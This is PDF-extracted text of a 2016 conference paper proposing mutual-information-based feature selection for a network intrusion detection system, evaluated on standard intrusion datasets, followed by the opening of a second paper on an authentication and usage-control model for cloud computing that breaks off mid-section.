Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Using Mutual Information for Feature Selection in a Network Intrusion


Detection System
Mohammed A. Ambusaidi
Colleges of Applied Sciences, Nizwa, Oman
Email: mohamed [email protected]
ABSTRACT
This paper presents the feature selection problem
for data classification arising from a large number of redundant and irrelevant features. It first
proposes a Mutual-Information-based Feature Selection Algorithm, MIFSA in short, that analytically selects the best features for classification. The
key contribution is the use of mutual information,
which can handle linearly and non-linearly dependent data features. Its effectiveness is evaluated in
cases of network intrusion detection. An Intrusion
Detection System (IDS) is built using the feature
selected by our proposed feature selection algorithm, named IDS+MIFSA. To verify the feasibility
of IDS+MIFSA, several experiments are conducted
on three well-known intrusion detection datasets:
KDD Cup 99, NSL-KDD and Kyoto 2006+ dataset.
The experimental results show that our method performs better than other algorithms in most cases in
terms of classification accuracy.

KEYWORDS
Feature selection, Mutual information, Intrusion
detection system

INTRODUCTION

Feature selection is a technique for eliminating irrelevant and redundant features and selecting the optimal subset of features that produces a better characterisation of patterns belonging to different classes. The feature selection problem has been around since the early
1970s. Due to its computational complexity, it
remains an open area for researchers. Feature
selection reduces computational cost, facilitates data understanding, improves the performance of modelling and prediction and speeds
up the detection process of IDS [1].
A feature is relevant to the class if it contains

ISBN: 978-1-941968-37-6 2016 SDIWC

important information about the class; otherwise it is irrelevant or redundant. Since mutual
information is good at quantifying the amount
of information shared by two random variables, it is often used as an evaluation criterion
to evaluate the relevance between features and
class labels.
Several feature selection algorithms, including
those in [2, 3, 4, 5, 6, 7, 8], have been proposed in literature based on the principle of
mutual information. Battitis MIFS [2] is one
of the earliest methods that evaluate features
based on their relevance to classification. Numerous studies, including [3] to [8], have been
conducted to improve Battitis MIFS. A clearer
and more detailed explanation of these methods and their limitations is given in Section 2.
The key contributions of this paper are as follows.
1. This work proposes a new feature selection algorithm in which mutual information is introduced to evaluate the
dependence between features and output
classes. The most relevant features are retained and used to construct classifiers for
their respective classes. This method is an
enhancement of Mutual Information Feature Selection (MIFS) [2] and Modified
Mutual Information-based Feature Selection (MMIFS) [7].
2. After tackling feature selection, the selected features is then used to train the
classifier and build an IDS.
3. We conduct complete experiments on
three well-known IDS datasets. This is
very important in evaluating the performance of IDS since these datasets contain most recent and novel attack patterns. In addition, these datasets are fre-

97

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

quently used in the literature to evaluate


the performance of IDS. Moreover, these
datasets have various sample sizes and
different numbers of features, so they provide many more challenges for comprehensively testing feature selection algorithms.
The rest of this paper is as follows. Section
2 briefly reviews the concept of mutual information and works that are related to this study.
Section 3 introduces the proposed feature selection algorithm MIFSA. Section 4 details our
detection framework showing different detection stages involved in the proposed scheme.
Section 5 presents the experimental details and
results. Finally, we draw a conclusion and discuss our future work in Section 6.
2

BACKGROUND TO MUTUAL INFORMATION

The key concept of mutual information comes


from information theory which was proposed
in 1948 by Shannon [9]. It describes the
amount of information shared between two
random variables. It is a symmetric measure of
the relationship between two random variables,
and it yields a non-negative value [10]. A zero
value of MI indicates that the two observed
variables are statistically independent. Given
two random variables X = {x1 , x2 , ..., xn }
and Y = {y1 , y2 , ..., yn }, where n is the total
number of samples, the mutual information between variables X and Y is defined as:

I(X; Y ) = H(X) + H(Y ) H(X, Y ) (1)


where H(X) and H(Y ) are the uncertainty of
X and Y and H(X, Y ) is the joint entropy of
X and Y .
To quantify the amount of knowledge on variable X provided by variable Y (and vice versa),
mutual information can be defined as follows.

I(X; Y ) =

XX
xX yY

p(x, y) log

p(x, y)
. (2)
p(x)p(y)

ISBN: 978-1-941968-37-6 2016 SDIWC

where p(x, y) is the joint probability density


function of X and Y . From Eq. (2), a
high value of I(X; Y ) indicates both X and Y
are closely related; otherwise, a zero value of
I(X; Y ) means both X and Y are independent.
As stated above, a feature is relevant to the
class if it contains important information about
the class; otherwise it is irrelevant. Since
mutual information is good at quantifying the
amount of information shared between two
random variables, it is often used to determine
the relevance between features and the output
class. In this context, features with high predictive power are those that have larger mutual
information I(C; f ). On the contrary, in the
case of I(C; f ) equal to zero, the feature f and
the Class C are proven to be independent of
each other. This suggests that feature f contains redundant information.
Recently, mutual information has been used by
a number of researchers to develop supervised
feature selection methods [2, 3, 4, 5, 6, 6, 7, 8].
Battiti in [2] harnessed MI between inputs and
outputs for a single selection of features by calculating the I(C; fi ) and I(fs , fi ), where fs
and fi are candidate features and C is the class
label. MIFS selects the feature that maximizes
I(C; fi ), which is the amount of information
that feature fi carries about the class C, and
is corrected by subtracting a quantity proportional to the MI with the features selected previously. MIFS is a heuristic incremental search
algorithm and the selection process continues
until a desired number of R inputs are selected.
Eq. (3) shows the evaluation function of MIFS.
X
I(C; fi )
I(fi ; fs ),
(3)
fs S

where is a user-defined parameter that is applied to regulate the relative significance of the
redundancy between the current feature and the
set of previously selected features.
As can be seen, Eq. (3) consists of two terms.
The left-hand side term, I(C; fi ), represents
the amount of information that feature fi carries about the class C. A relevant feature is the
one that maximizes this term. The right-hand

98

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

P
side term, I(fs ; fi ), is used to eliminate
the redundancy among the selected features.
In follow-up research, various methods have
been proposed to enhance Battitis MIFS. Most
of the studies have been conducted on the righthand side term of Eq. (3). Kwak and Choi in
[3] made a better estimation of MI between input features and output classes and proposed a
greedy selection algorithm named MIFS-U, in
which U stands for uniform information distribution. MIFS-U shows a better estimation of
I(C; fi ) than MIFS. The algorithm of MIFS-U
differs from that of MIFS in the right-hand side
term as shown in Eq. (4).
I(C; fi )

X I(C; fs )
I(fi ; fs )
H(fs )
f S

(4)

where |S| is the cardinality of the set S, which


is used to control the influence of the number
of selected features since the right-hand side
of the algorithm is a cumulative sum. How0
ever, in the case of = / | S | then
MMIFS are equal to Battitis MIFS. Therefore,
the unbalance between the left-hand and righthand sides in Eq. (5) remains totally unsolved
in MMIFS [7]. This might result in selecting irrelevant features. In addition, similar to
Battitis MIFS and Kwaks MIFS-U, selecting
0
an appropriate value for the parameter in
MMIFS remains an open question.
3

PROPOSED FEATURE-SELECTIONBASED MUTUAL INFORMATION

Despite the redundancy parameter used in


the aforementioned methods to help control the
redundancy among features, it remains an open
question as to how to choose the most appropriate values for these parameters. If the chosen value is too small, the redundancy between
input features is not taken into consideration
and therefore both relevant and redundant features are involved in the selection processes. If
the chosen value is too large, the algorithms
only consider the relation between input features rather than the relation between each input feature and the class [6]. Thus, it is hard to
determine the value of the parameter. In addition, both MIFS and MIFS-U neglect the influence of the number of selected features. This
reduces the influence of I(C; fi ) on Battitis
MIFS and Kwaks MIFS-U when the term on
the right-hand side in both methods increases,
which is because this term is a cumulative sum
[5]. This results in the irrelevant features being
selected into the set S.
These limitations have been studied by Amiri
in [7] and a Modified version of MIFS proposed. MMIFS set the value of parameter
0
0
to be equal to / | S |, where is the redundancy parameter, as shown in Eq. (5).

ISBN: 978-1-941968-37-6 2016 SDIWC

gm = argmax(I(C; fi ) N M I(fi ; G)) (6)


fi

)
I(fi ; fs ),
I(C; fi ) (
| S | f S

As discussed above, there is no a specific way


to select the best value for the parameter as
it is required in Battitis MIFS, Kwaks MIFSU and Amiris MMIFS. Therefore, in this paper we propose a new variation of MIFS. This
method eliminates the burden of selecting an
appropriate value for and keeps the values of
the right-hand side of our evaluation function
within the range of [0,1].
Given a features set F = {f1 , f2 , . . . , fn },
where n is the total number of features, the
task is to select the best subset of features G =
{g1 , g2 , . . . , g|G| }, where |G| is the number of
selected features. Eq. (6) shows the proposed
feature selection criterion, which is intended to
iteratively select a feature from an initial input
feature set that maximizes I(C; fi ) and minimizes the average of redundancy simultaneously. On the right-hand side, N M I(fi ; G), of
Eq. (6), which is presented in Eq. (7), we normalize the value of MI between candidate feature fi in F \ {g1 , g2 , ..., gm1 } and the set of
previously selected features, {g1 , g2 , ..., gm1 },
based on the entropies of features in
F \{g1 , g2 , ..., gm1 } in order to select the m-th
feature, gm , from F \ {g1 , g2 , ..., gm1 }.

(5)

where I(C; fi ) is the amount of information

99

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

that feature fi carries about the class C. i


{1, 2, . . . , n} and n is the total number of features in F .
m1
1 X I(fi ; gj )
N M I(fi ; G) =
,
| G | j=1 H(fi )

(7)

where j {1, 2, . . . , | G |} and | G | is the cardinality of set G.


Therefore, the overall procedure of the proposed feature selection algorithm is as follows.
Algorithm 1 Overall procedure of the proposed MIFSA
Input: Feature set F = {fi , i = 1, ..., n},
R : the number of selected features,
R n.
Output: G - the selected feature subset
1. Initialization: set G =
2. Calculate I(C; fi ) (i = 1, ..., n) for each
feature in F .
3. Select the feature fi that maximizes
I(C; fi ).
Set F F \ { fi }; G G { fi }.
4. while | G | < R do
for each feature fi F do
Calculate N M I(fi ; G) in Eq. (7) for
all pairs of (fi ; G).
end
Using Eq. (6) select gm .
Set F F \ { gm }, G G { gm }.
end
return G
4

INTRUSION DETECTION FRAMEWORK BASED ON FEATURE SELECTION

The proposed intrusion detection system is depicted in Figure 1. It comprises four main
stages: (1) data collection, where a sequence of
network packets is collected; (2) data preprocessing, where training and test data are preprocessed and important features that can distinguish one class from another are selected;
(3) classifier training, where the model for classification is trained; and (4) attack recognition,
where the trained classifier is used to detect intrusions on the test data. One can find more
details about these stages in [11].

ISBN: 978-1-941968-37-6 2016 SDIWC

4.1

Data Collection

This is the first and most important stage to intrusion detection where a sequence of network
packets is collected.
4.2

Data Pre-processing

In this stage, the obtained training and test


data from the data collection stage are first
pre-processed to generate basic features. This
phase involves three main steps. The first step
is data transferring, in which every symbolic
feature in a dataset is first converted into a numerical value. The second step is data normalisation, in which each feature in the data is
scaled into a well-proportioned range to eliminate the bias in favour of features with greater
values from the dataset. The third step is feature selection, in which the proposed MIFSA
is used to nominate the most important features that are then used to train the classifier
and build our detection model.
4.3

Classifier Training

In this stage, the classifier is trained. Once the


best subset of features is selected, this subset
is then passed into the classifier training stage
where a specific classification method is employed.
4.4

Attack Recognition

In this stage, the trained model is used to detect


intrusions on the test data. After completing all
the iteration steps and training the final classifier which includes the most correlated and important features, the normal and intrusion traffic can be recognised by using the saved trained
classifier. The test data is then taken through
the trained model to detect attacks.
5
5.1

EXPERIMENTS AND RESULTS


Benchmark Datasets

To validate performance fairly, three wellknown benchmark datasets are adopted in our
experiments. These three datasets are KDD
Cup 99 datasets [12], NSL-KDD datasets [13]
and Kyoto 2006+ datasets [14]. All of these

100

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Figure 1. The framework of the proposed IDS based on MIFSA

datasets are freely accessed. These datasets


are frequently used in literature to assess the
performance of feature selection algorithms.
In addition, these datasets have various types,
sample sizes and different numbers of features which can provide comprehensive tests
in validating feature selection methods. As
our scheme is also studying feature behaviour,
these datasets can be used to demonstrate the
validity and novelty of our algorithm. Table 1
summarizes some general description information about these datasets.

lected from both honeypots and regular servers


that are deployed at Kyoto University. Each
connection in this dataset is unique and has
23 features. For the experiments on the Kyoto
dataset, samples that form the data of the days
2009 August 27, 28, 29, 30 and 31 are selected
and they contain the latest updated data.
For experimental purposes, 1000 samples from
each dataset are randomly selected. Half of the
samples are used as training data and the other
half is used as testing data.
5.2

Table 1. General information and summary of datasets


used in the experiments.
Dataset
KDD Cup 99
NSL-KDD
Kyoto 2006+

Feature
41
41
23

Class
5
5
2

Training
500
500
500

Testing
500
500
500

The KDD Cup 99 dataset is one of the most


popular intrusion detection datasets and is
widely applied to evaluate the performance of
intrusion detection systems [15]. It consists of
five different classes: normal and four types
of attack (i.e., DoS, Probe, U2R and R2L).
The NSL-KDD is a new revised version of the
KDD Cup 99 that has been proposed by Tavallaee et al. in [13]. This dataset addresses
some problems included in the KDD Cup 99
dataset such as the huge number of redundant
records in KDD Cup 99 data. Similar to the
KDD Cup 99 dataset, each record in the NSLKDD dataset has 41 different quantitative and
qualitative features. The Kyoto 2006+ dataset
was presented by Song et al. [14]. The dataset
covers over three years of real traffic data col-

ISBN: 978-1-941968-37-6 2016 SDIWC

Experimental Setup

During the experiments, the value of R which


represents the number of desired features in
Algorithm 1 is given by the user in advance.
To achieve impartial results and decrease the
random selection effect, all of the experimental
results presented in this paper are the averages
of 10 independent runs.
To avoid the bias in favor of features with
greater values in all datasets, every feature
within each record is normalized by the respective maximum value and falls into the same
range of [0,1].
5.3

Results and Discussion

In order to prove the performance of our IDS


+ MIFSA, we conducted many experiments to
compare other state-of-the-art approaches. We
divided the KDD Cup 99 into five different
classes and more experiments were conducted
on DoS, Probe, U2R and R2L attacks. Tables
2, 3 and 4 depict the comparison results based
on KDD Cup test, NSL-KDDTrain+ and Kyoto 2006+ datasets respectively. The results il-

101

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

lustrated in these tables strongly indicate that


our detection model shows promising results in
comparison with other models.
Figure 2 illustrates a comparison of the proposed IDS+MIFSA with the systems proposed
in [16, 17, 18] and [19] that have been tested
on the KDD Cup 99 in terms of the classification accuracy. Among those IDSs the proposed
IDS enjoyed the best classification accuracy.
Table 2 shows the accuracy percentage
achieved by different detection models for the
various attack classes on KDD Cup 99 dataset.
Regarding the results obtained by other authors, it can be seen that the proposed approach
achieves the best accuracy among all models
and in all classes.

Figure 3. Comparison results of classification accuracy


on NSL-KDD dataset

tested on NSL-KDDTrain+ datasets in terms


of detection and rate of false-positive. It is
clear that our approach enjoys the best results
at 99.15% detection rate and 0.81% false positive rate.
Table 3. Comparison results based on NSL-KDD
dataset (n/a means no available results.)

Figure 2. Comparison results of classification accuracy


on KDD Cup 99 dataset

Table 2. Comparison results in terms of accuracy rate


with other IDSs based on the KDD Cup 99 dataset
System

DoS

IDS + MIFSA

99.89 99.93 99.97 99.93

SVM + PBR [16]

99.22 99.38 99.87 99.78

SVM [17]

99.25 99.70 99.87 99.78

Bayesian [18]

98.95 99.57 48.00 98.93

FNT [19]

98.75 98.39 99.70 99.09

Radial SVM [20]

98.94 97.11 97.80 97.78

Probe U2R

R2L

Figure 3 plots the classification accuracies


achieved by different detection models that
have been tested on the NSL-KDD dataset.
The results in the figure shows that the performance of IDS + MIFSA is better than other detection systems.
Table 3 demonstrates the result achieved by our
proposed IDS compared with the approaches

ISBN: 978-1-941968-37-6 2016 SDIWC

System
IDS + MIFSA
DMNB [21]
TUIDS [22]
HTTP-IDS [23]
Hybrid IDS [24]

# Feature
16
all
all
13
all

DR
99.15
n/a
98.88
99.03
99.10

FPR
0.81
3.0
1.12
1.0
1.2

Table 4 summarizes the results achieved by


the proposed IDS and CSV-ISVM proposed
in [25]. The results in this table are based
on Kyoto 2006+ dataset. In general, it is
clear that both detection models show continuous improvements in performance. However,
from the very first iterations the results obtained by our IDS are better compared to CSVISVM. For example, the results achieved by
IDS + MIFSA in the last iteration show 98.18%
and 0.31% for the detection and false positive
rate respectively. In contrast, CSV-ISVM produces 90.15% and 2.31% for the final detection and false positive rate respectively. The
table also demonstrates the training and testing time taken by both detection systems. Unlike CSV-ISVM, IDS + MIFSA take much less
time. This relates to the fact that IDS + MIFSA
uses a feature selection step that decreases the
number of desired features for the classifier.

102

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 4. Comparison performance of classification on the Kyoto 2006+ dataset (the days 2007, Nov. 1,2 and 3)

Iteration count

1
2
3
4
5
6
7
8
9
10
6

IDS + MIFSA
DR

FPR

96.14
97.83
97.93
97.98
97.98
97.99
98.01
98.03
98.07
98.18

0.80
0.51
0.50
0.49
0.43
0.41
0.37
0.33
0.33
0.31

CSV-ISVM [25]

T rain(s) T est(s)
0.106
0.213
0.525
1.040
1.235
1.228
1.723
2.392
2.775
3.299

CONCLUSION

This paper has proposed a supervised feature selection algorithm, namely MutualInformation-based Feature Selection Algorithm (MIFSA). MIFSA is a modified version
of MIFS and MMIFS. MIFSA eliminates the
need for setting the redundancy parameter
required in MIFS and MMIFS. This is useful
in practice since there is no specific guideline
for setting the best value for this parameter.
The feasibility of MIFSA is evaluated in the
cases of intrusion detection by building an intrusion detection system using the features selected by our proposed MIFSA. The proposed
IDS + MIFSA has been evaluated using three
well-known intrusion detection datasets: KDD
Cup 99, NSL-KDD and Kyoto 2006+. The
performance of IDS + MIFSA on all datasets
showed better classification performance in
terms of classification accuracy, detection rate
and false positive rate compared to existing detection systems.
Although the proposed MIFSA has produced
encouraging results, it could be further improved by enhancing the search strategy. We
will put this into consideration when optimizing our method in the future.
REFERENCES
[1] P. Louvieris, N. Clewley, X. Liu, Effects-based
feature identification for network intrusion detection, Neurocomputing 121 (2013) 265273.

ISBN: 978-1-941968-37-6 2016 SDIWC

0.213
0.286
0.550
1.023
1.073
1.633
1.779
2.572
3.081
3.728

DR

FPR

T rain(s)

T est(s)

79.65
84.72
85.58
86.08
86.81
87.24
88.08
88.10
89.64
90.15

4.54
4.03
3.92
3.80
3.54
3.33
3.03
3.01
2.52
2.31

1.823
3.463
5.26
9.662
11.302
13.593
14.348
17.475
23.02
27.257

7.76
10.363
15.443
19.532
22.735
25.887
28.23
31.615
35.547
40.097

[2] R. Battiti, Using mutual information for selecting


features in supervised neural net learning, IEEE
Transactions on Neural Networks 5 (4) (1994)
537550.
[3] N. Kwak, C.-H. Choi, Input feature selection
for classification problems, IEEE Transactions on
Neural Networks 13 (1) (2002) 143159.
[4] H. Peng, F. Long, C. Ding, Feature selection based
on mutual information criteria of max-dependency,
max-relevance, and min-redundancy, IEEE Transactions on Pattern Analysis and Machine Intelligence 27 (8) (2005) 12261238.
[5] P. A. Estevez, M. Tesmer, C. A. Perez, J. M. Zurada, Normalized mutual information feature selection, IEEE Transactions on Neural Networks
20 (2) (2009) 189201.
[6] S. Cang, H. Yu, Mutual information based input
feature selection for classification problems, Decision Support Systems 54 (1) (2012) 691698.
[7] F. Amiri, M. Rezaei Yousefi, C. Lucas, A. Shakery,
N. Yazdani, Mutual information-based feature selection for intrusion detection systems, Journal of
Network and Computer Applications 34 (4) (2011)
11841199.
[8] M. Ambusaidi, X. He, P. Nanda, Z. Tan, Building
an intrusion detection system using a filter-based
feature selection algorithm, IEEE Transactions on
Computers PP (99) (2016) 11.
[9] C. E. Shannon, A mathematical theory of communication, ACM SIGMOBILE Mobile Computing
and Communications Review 5 (1) (2001) 355.

103

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

[10] T. M. Cover, J. A. Thomas, Elements of information theory, John Wiley & Sons, 2012.

works & Communications (NetCom), Vol. 131,


Springer, 2013, pp. 499507.

[11] A. M. Ambusaidi, X. He, Z. Tan, P. Nanda, L. F.


Lu, T. U. Nagar, A novel feature selection approach for intrusion detection data classification,
in: International Conference on Trust, Security
and Privacy in Computing and Communications,
IEEE, 2014, pp. 8289.

[21] M. Panda, A. Abraham, M. R. Patra, Discriminative multinomial naive bayes for network intrusion
detection, in: International Conference on Information Assurance and Security (IAS), IEEE, 2010,
pp. 510.

[12] S. J. Stolfo, W. Fan, W. Lee, A. Prodromidis, P. K.


Chan, Cost-based modeling for fraud and intrusion detection: Results from the jam project, in:
DARPA Information Survivability Conference and
Exposition, Vol. 2, IEEE, 2000, pp. 130144.
[13] M. Tavallaee, E. Bagheri, W. Lu, A.-A. Ghorbani,
A detailed analysis of the kdd cup 99 data set, in:
Proceedings of the Second IEEE Symposium on
Computational Intelligence for Security and Defence Applications, 2009, pp. 16.
[14] J. Song, H. Takakura, Y. Okabe, M. Eto, D. Inoue,
K. Nakao, Statistical analysis of honeypot data and
building of kyoto 2006+ dataset for nids evaluation, in: Proceedings of the First Workshop on
Building Analysis Datasets and Gathering Experience Returns for Security, ACM, 2011, pp. 2936.

[22] P. Gogoi, M. H. Bhuyan, D. Bhattacharyya, J. K.


Kalita, Packet and flow based network intrusion
dataset, in: Contemporary Computing, Vol. 306,
Springer, 2012, pp. 322334.
[23] M. M. Abd-Eldayem, A proposed http service
based ids, Egyptian Informatics Journal 15 (1)
(2014) 1324.
[24] G. Kim, S. Lee, S. Kim, A novel hybrid intrusion detection method integrating anomaly detection with misuse detection, Expert Systems with
Applications 41 (4) (2014) 16901700.
[25] R. Chitrakar, C. Huang, Selection of candidate
support vectors in incremental svm for network intrusion detection, Computers & Security 45 (2014)
231241.

[15] C.-F. Tsai, Y.-F. Hsu, C.-Y. Lin, W.-Y. Lin, Intrusion detection by machine learning: A review,
Expert Systems with Applications 36 (10) (2009)
1199412000.
[16] S. Mukkamala, A. H. Sung, Significant feature selection using computational intelligent techniques
for intrusion detection, in: Advanced Methods
for Knowledge Discovery from Complex Data,
Springer, 2005, pp. 285306.
[17] S. Mukkamala, A. H. Sung, A. Abraham, Intrusion detection using an ensemble of intelligent
paradigms, Journal of network and computer applications 28 (2) (2005) 167182.
[18] S. Chebrolu, A. Abraham, J. P. Thomas, Feature
deduction and ensemble design of intrusion detection systems, Computers & Security 24 (4) (2005)
295307.
[19] Y. Chen, A. Abraham, B. Yang, Feature selection
and classification flexible neural tree, Neurocomputing 70 (1) (2006) 305313.
[20] A. Chandrasekhar, K. Raghuveer, An effective
technique for intrusion detection using neurofuzzy and radial svm classifier, in: Computer Net-

ISBN: 978-1-941968-37-6 2016 SDIWC

104

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Cloud Authentication Logic on Data Security


Maryam Shahpasand1, Muhammad Ehsan Rana1, Ramlan Mahmod2, Nur Izura Udzir2
1

Asia Pacific University of Technology & Innovation (APU), 2Universiti Putra Malaysia(UPM)
[email protected], [email protected], {ramlan, izura}@upm.edu.my

ABSTRACT
Cloud computing provides dynamic capacity and
capabilities, and it imparts resources as services
over the Internet. In cloud computing, information
migrated to third parties and it poses enormous
security challenges such as privacy leakage and
illegal access. This paper presents an authentication
logic to protect data from illegal access before and
during the usage in cloud computing. Proposed
authentication logic can be modified and adapted to
different requirements in various types of cloud
computing services. It achieved by changing the
formulas through assigning new parameters and
brings a flexible and reusable authentication model.
Decision makings are performed by four functions.
The authentication and requirement functions
control the access request before the usage.
Authorization and obligation functions are executed
during the usage based on right requests. The
implementation demonstrates the theoretical result
of the proposed model.

KEYWORDS
Authentication, Authorization, Cloud computing,
Data Security, Formal Method.

1 INTRODUCTION
In recent years, cloud computing environment
has grown fast without emerging new
infrastructure, licensing new software and
training personnel. Cloud computing delivers
services to end users in three layers as shown in
figure 1. They include [1]:

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 1. Cloud Computing layes [1]

Client: Computer Hardware or Computer


Software that uses the developed application.
Saas (software as a service): applications run
by users remotely over the Internet and it do not
need to install and run applications on their own
computers.
Paas (platform as a service): it includes
computing resources as service like Internet
access.
Iaas (infrastructure as a service): it delivers
computer infrastructure. Services consist
specific application and operating system.
Servers: the physical servers where the data is
stored.
However, each layer has its own security
issues, the benefits of saas layer for customers
eager us to focus on security issues specifically
privacy and illegal access in this layer. Sears
brings cost reduction and operational efficiency
improvement for clients, but on the other hand
security and storing data is still in a dark space
and it makes vast security concerns [2]
Numerous information migrated to third parties
and it poses enormous security challenges in

105

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

cloud computing. Privacy leakage and illegal


access arise while sensitive data are shared on
cloud servers by user outsourcing. Based on a
survey of security issues of cloud computing
[3], the threats of this environment consist:
accessibility vulnerabilities, virtualization
vulnerabilities, web application vulnerabilities
such as SQL (Structured Query Language)
injection and cross-site scripting, physical
access issues, privacy and control issues arising
from third parties having physical control of
data, issues related to identity and credential
management, issues related to data verification,
tampering, integrity, confidentiality, data loss
and theft, issues related to authentication of the
respondent device or devices and IP spoofing.
Several approaches developed to keep data
confidential against unauthorized users. Despite
of current solutions, heavy computations
overhead of cryptographic method and lack of
authorization during the usage still persist.
This paper is organized as follows: Section 2
presents related works of security of cloud
computing, while Section 3 introduces a brief
overview of usage control. Section 4 describes
usage decision models for cloud computing,
including the authentication and Requirement
functions for controlling access at login time,
Authorization and Obligation functions for
controlling access during the usage. Finally,
Section 5 concludes the paper and outlines our
future work.
2 Related Works
Cloud computing is a style of computing
which is scalable in capacities and capabilities.
The idea of cloud computing emerged in 90s
[4] and this environment provided resources as
services over the Internet [5]. Security area in
the cloud has been considered by several
researchers. They defined standards and
security solutions for this environment but
cloud security issues are still the main concern
of users and providers. Clients data is stored at
the saas provider data center and migrated
during the data lifetime [6]. Therefore, data

ISBN: 978-1-941968-37-6 2016 SDIWC

security is related to both client and saas


provider. Moreover, data availability and
duplications show ambiguous data location.
Consequently, they cause enormous security
challenges in data privacy and access control at
saas layer.
One of the major features of cloud computing is
multi-tenancy. Saas applications provide the
capability of storing data by multiple users.
Data of various users resides at the same
location whether it is physical level or
application level [7]. Cloud providers must
ensure data segregation and data safety for
customers and prevent common threats in this
area such as injecting, writing mask code and
hacking via loop holes. Indeed, it will achieve
by an access control model to specify
authorized users for any data request. Raj
proposed a resource isolation model for data
security during the processing. It isolated the
processor caches in virtual machines [8] but it
cannot cover all virtualization requirements in
the cloud.
Existing cloud vendors control data accessing
by fine-grained authorization and they provide
data security by strong encryption techniques
for the communications in the cloud [3].
Furthermore, backup data encrypted by strong
schemes to protect sensitive data from leakages.
However, encryption as current solutions
reduces data tampering, it brings a heavy
computation overhead on the cloud. Vendors
administrators have been motivated to find a
method to protect data anywhere and anytime
with light computation.
Privacy breach and unauthorized access are the
other cloud issues which are directed by lack of
strong authentication for cloud users. Data
storing in multiple location is the main reason
of these issues [9]. In cloud computing, there
are several legal locations for specific
information at the same time [3]. Enormous
information can be accessed by saas providers
employees and they can expose information in
public with a single incident [10]. Furthermore,
information can be purged or saved for some
unknown reason [11] and confidentiality can be

106

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

affected by the location of information in the


cloud. Roughly speaking, widespread usage of
cloud computing services - various areas like
education systems, health and medical centers
and data storage sites- highlights the need of
strong ensuring of confidentiality.
Saas applications develop over the Internet and
security issues of the web applications effect on
them and increase saas application vulnerability
[12]. Indeed, saas security challenges are the
same as web applications. The Open Web
Application Security Project has identified Top
ten security risks faced by web applications
[13]. SQL injection is the first attack in the
OWASP list and vulnerability of web
applications by SQL injection is more than
other attacks.
In addition, standard frameworks necessitate for
clarifying security architecture and it could
reduce security challenges in web application
development. Despite, all organizations impose
their own architecture based on their budget, a
relevant research has been inspected by Tsai in
2009 [14] and define a standard security
architecture to solve part of security issues in
this area.
The most important security issues in cloud
computing related to virtualization as one of the
main components of a cloud. Over the virtual
environment in the cloud, malicious users break
the security restrictions, gain permissions and
exploit software.
Ambiguity of data location and multi-tenancy
necessitate saas vendor to protect clients
private data from illegal access through
malicious users. Therefore, management of
integrated and complex access control policies
is one of the critical issues on cloud computing.
This paper presents an overview of usage
control and then proposes a decision model to
prevent unauthorized access not only at access
point but also during the usage on cloud
computing. The model is shown in cloud
architecture and finally, formal statements and
the algorithm are introduced.
3 Authentication and Authorization

ISBN: 978-1-941968-37-6 2016 SDIWC

In traditional models, Access control systems


evaluated resource access at login time. Right
granting was defined by the systems in
successful authentication, and did not change
during the usage [15]. New security issues have
been come up with the evolution of computer
systems, and traditional access control models
could not address them adequately. In recent
decade, research in access control area has been
led to usage control concept. The new concept
became the next generation of access control
system and generalized it [16].
UCON model introduced usage control for the
first time in 2002 [17] and they presented a four
layer model which called OM-AM engineering
framework in 2003 [18]. The presented model
was extended in 2004 with the addition of
ongoing usage [19]. Usage control concept
includes traditional access control, privacy
management, digital right management, and
trust management [20, 21]. Moreover, it
represents object rights for these concepts [22].
The relationship between access control and
usage control is shown in 0

Figure 2. Access and Usage Control Defnition [22]

Main decision factors of usage control system


are consisted: authentication, obligation and
condition [20, 21]. Resource access permissions
are granted to users based on these factors.
Usage control requirements are defined by a
formal specification language in two aspects
including usage restrictions and essential action
[23]. Permissions transferring between users
presented in delegation concept for usage
control system [24-26]. Control mechanism
features which are essential for usage control
areas were determined in 2007 [27].
A comprehensive access control system can be
broken by conflicts and leakages of security
policies [28-30]. Attribute classification was
inspected to solve policy conflicts [31]. Various

107

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

business processes develop in a single cloud


and different organizations use integrated
policy through resource sharing. Therefore, a
flexible model must be present to provide
policy's incorporation and integration on the
cloud. Moreover, organizations or cloud
providers have their own definition types of
security policies and the model should be
independent of a definition type.
4 AUTHENTICATION LOGIC
In this section, usage decision models will be
discussed for usage control system in a cloud
computing environment. Usage permission
checks before (pre) and during (ongoing) access
based on attributes of subject, object and object
rights. A decision will be made according to
four decision making functions, they include:
Usage Decision Authentication (Ae), Usage
Decision Authorization (Ao), Requirment (Re),
Obligation (Ob). We now describe the
formalization of the usage decision model.
In this model, we use these elements:
Subject (Sub): In the proposed model,
there is a set of the object right
requester and each member named
subject. Subject holds the rights and
executes the actions which are granted
by the rights. They are defined by their
attributes.

to it. The object can act as a subject


and can have right request for another
object right. Also in the proposed
system, there are some derivative
objects. The derivative object is a sideeffect of other object creation like log
and history files. Object == {Objj |
j=1n}
Object Attribute (ATT (Obj)): Object
attributes are object properties and can
be used for usage decision process.
There are some common object
attributes like id and name and they
can
update
by
the
system
administrator. Policies define attribute
update time, it may be done before,
during or after access. Specific object
attributes depend on the object type.
For example, some attributes of an
image are different from a video.
Object Right (ObjR): Object right is a
member of the object usage
permission set. Subject can exploit
object right and the permissions are
defined by usage decision system.
Initial Object Right (IObjR): Simplest
right of an object which is necessary
or prerequisites of other object rights.
2.1 Authentication Function

Subject in the cloud includes client software


and hardware for delivering of cloud services
and cloud computing will be useless without it.
Subject == {Subi | i=1n}
